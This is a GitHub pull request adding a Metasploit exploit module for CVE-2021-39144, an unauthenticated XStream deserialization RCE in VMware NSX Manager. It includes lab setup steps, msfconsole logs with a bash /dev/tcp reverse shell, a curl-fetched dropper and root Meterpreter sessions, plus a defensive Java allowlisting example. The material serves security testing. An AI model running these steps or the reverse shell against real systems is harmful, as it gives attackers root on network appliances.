
Pre-authenticated Remote Code Execution in VMware NSX Manager using XStream [CVE-2021-39144] #17222

Merged
merged 12 commits into from
Nov 15, 2022

Conversation

h00die-gr3y
Contributor

@h00die-gr3y h00die-gr3y commented Nov 4, 2022

VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance.

VMware Cloud Foundation 3.x and, more specifically, NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to Remote Command Injection.

This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:

  • VMware NSX Manager
  • Version 6.4.13
  • Version 6.4.4

Verification

Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.

  • Go to Download VMware NSX for vSphere 6.4.13
  • Note: You need to be a customer with valid VMware subscriptions
  • Download the ova file VMware-NSX-Manager-6.4.13-19307994.ova
  • Open VirtualBox and import the ova file
  • After successful import, start the VM and you have a VMware NSX Manager running which is accessible using url https://<nsx-manager-ip>
  • Credentials to login: User: admin, password: default
  • Use the module and options below to test the vulnerability...
  • Start msfconsole
  • use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
  • set rhosts <target host ip>
  • set lhost <attacker host ip>
  • exploit
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.100.5    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000

pwd
/usr/lib/tanuki/bin
whoami
root
exit
[*] 192.168.100.5 - Command shell session 14 closed.
msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.100.5    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Linux Dropper
[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
[*] Sending payload to 192.168.100.5 (curl/7.81.0)
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Sending stage (3045348 bytes) to 192.168.100.5
[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.100.5
OS           : NSX Manager 6.4.13 (Linux 4.9.297)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Limitations

The vulnerability check is limited to detecting that VMware NSX Manager (NSX-V) is running; it does not obtain the version information.
However, all VMware NSX Manager versions up to 6.4.13 are vulnerable, except for 6.4.14, so most detected targets are likely to be vulnerable.
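
The endpoint described above hands attacker-supplied XML to XStream, and unrestricted XStream instantiates whatever class the XML names, which is how a deserialization gadget becomes root command execution on the appliance. The following Java is an added illustration of that bug class beside its hardened form; it is not code from the NSX Manager appliance or from this Metasploit module, and the `ApplianceRequest` type, its fields and the `request` alias are hypothetical. It assumes the `com.thoughtworks.xstream:xstream` library on the classpath.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

// Added illustration of the bug class behind CVE-2021-39144; not code from the
// NSX Manager appliance or from the Metasploit module. The request type, its
// fields and the "request" alias are hypothetical.
public class XStreamEndpoint {

    /** The only object this endpoint is supposed to accept (hypothetical). */
    public static class ApplianceRequest {
        public String action;
        public int timeoutSeconds;
    }

    /**
     * Vulnerable shape: no type allowlist is configured, so the root element
     * name in attacker-controlled XML selects the class XStream instantiates.
     * Before XStream 1.4.18 this was the library default unless the
     * application opted in to the security framework itself.
     */
    public static Object unsafeParse(String untrustedXml) {
        XStream xstream = new XStream();
        xstream.alias("request", ApplianceRequest.class);
        return xstream.fromXML(untrustedXml);
    }

    /**
     * Hardened shape: start from "deny everything", then allow only nulls,
     * primitives, String and the one request type. Any other class named in
     * the XML is rejected before an instance is created.
     */
    public static ApplianceRequest safeParse(String untrustedXml) {
        XStream xstream = new XStream();
        xstream.addPermission(NoTypePermission.NONE);              // drop all default permissions
        xstream.addPermission(NullPermission.NULL);                // allow null field values
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES); // int, boolean, ... and boxed forms
        xstream.allowTypes(new Class[] { String.class, ApplianceRequest.class });
        xstream.alias("request", ApplianceRequest.class);
        return (ApplianceRequest) xstream.fromXML(untrustedXml);
    }

    public static void main(String[] args) {
        // Constructed inputs: one legitimate request, and one whose root element
        // names an unrelated JDK type, standing in for a gadget-chain root class.
        String benign = "<request><action>status</action>"
                      + "<timeoutSeconds>30</timeoutSeconds></request>";
        String hostile = "<java.util.HashMap><entry><string>k</string>"
                       + "<string>v</string></entry></java.util.HashMap>";

        // Unrestricted parser: the attacker chose the class, and it was built.
        Object o = unsafeParse(hostile);
        System.out.println("unsafeParse built an instance of " + o.getClass().getName());

        // Allowlisted parser: the expected type still works ...
        ApplianceRequest r = safeParse(benign);
        System.out.println("safeParse accepted action=" + r.action
                           + " timeoutSeconds=" + r.timeoutSeconds);

        // ... and anything outside the allowlist is refused. At the root this is a
        // ForbiddenClassException; deeper in the tree XStream wraps it in a
        // ConversionException, so catch the common parent.
        try {
            safeParse(hostile);
            System.out.println("safeParse unexpectedly accepted the hostile input");
        } catch (XStreamException e) {
            System.out.println("safeParse rejected: " + e.getClass().getSimpleName()
                               + ": " + e.getMessage());
        }
    }
}
```

The allowlist is the control that matters for an unauthenticated endpoint: upgrading XStream closes the known gadget chains, but only an explicit `allowTypes` list keeps the parser from producing anything other than the request objects the endpoint was written to handle.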

@h00die-gr3y h00die-gr3y marked this pull request as draft November 4, 2022 13:42
@h00die-gr3y h00die-gr3y changed the title Pre-authenticated Remote Code Execution in VMWare NSX Manager using XStream [CVE-2021-39144] Pre-authenticated Remote Code Execution in VMware NSX Manager using XStream [CVE-2021-39144] Nov 4, 2022
@h00die-gr3y h00die-gr3y marked this pull request as ready for review November 5, 2022 15:15
@cdelafuente-r7 cdelafuente-r7 self-assigned this Nov 7, 2022
@jheysel-r7
Contributor

Addresses suggestion-module issue: #17198

Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Thanks for your contribution @h00die-gr3y ! I just left a few minor comments for you to review when you get a chance.

I don't have a valid VMware subscription and couldn't download the software to test your module. Would you mind recording a PCAP (with Wireshark or similar) and sending it to us at msfdev [at] metasploit.com? Please also include the msfconsole output with the option HttpTrace set to true. Thanks!

h00die-gr3y and others added 8 commits November 12, 2022 09:15
…_39144.rb


Agreed !

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…_39144.rb

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…_39144.rb

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…_39144.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
…_39144.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
…_39144.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
…_39144.rb

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
@h00die-gr3y
Contributor Author

Thanks for your contribution @h00die-gr3y ! I just left a few minor comments for you to review when you get a chance.

I don't have a valid VMware subscription and couldn't download the software to test your module. Would you mind recording a PCAP (with Wireshark or similar) and sending it to us at msfdev [at] metasploit.com? Please also include the msfconsole output with the option HttpTrace set to true. Thanks!

PCAP and HttpTrace have been sent!

@cdelafuente-r7
Contributor

Thank you for the files you sent @h00die-gr3y! I reviewed the console output/PCAP and everything looks good to me. I'll go ahead and land it.

@cdelafuente-r7 cdelafuente-r7 merged commit 494c960 into rapid7:master Nov 15, 2022
@cdelafuente-r7
Contributor

Release Notes

This adds an exploit module that leverages a Remote Command Injection vulnerability in VMware Cloud Foundation 3.x and NSX Manager Data Center for vSphere up to and including version 6.4.13. This vulnerability is identified as CVE-2021-39144.

@cdelafuente-r7 cdelafuente-r7 added rn-modules release notes for new or majorly enhanced modules module docs labels Nov 15, 2022
@h00die-gr3y
Contributor Author

Thanks guys! Pleasure working with you all again...
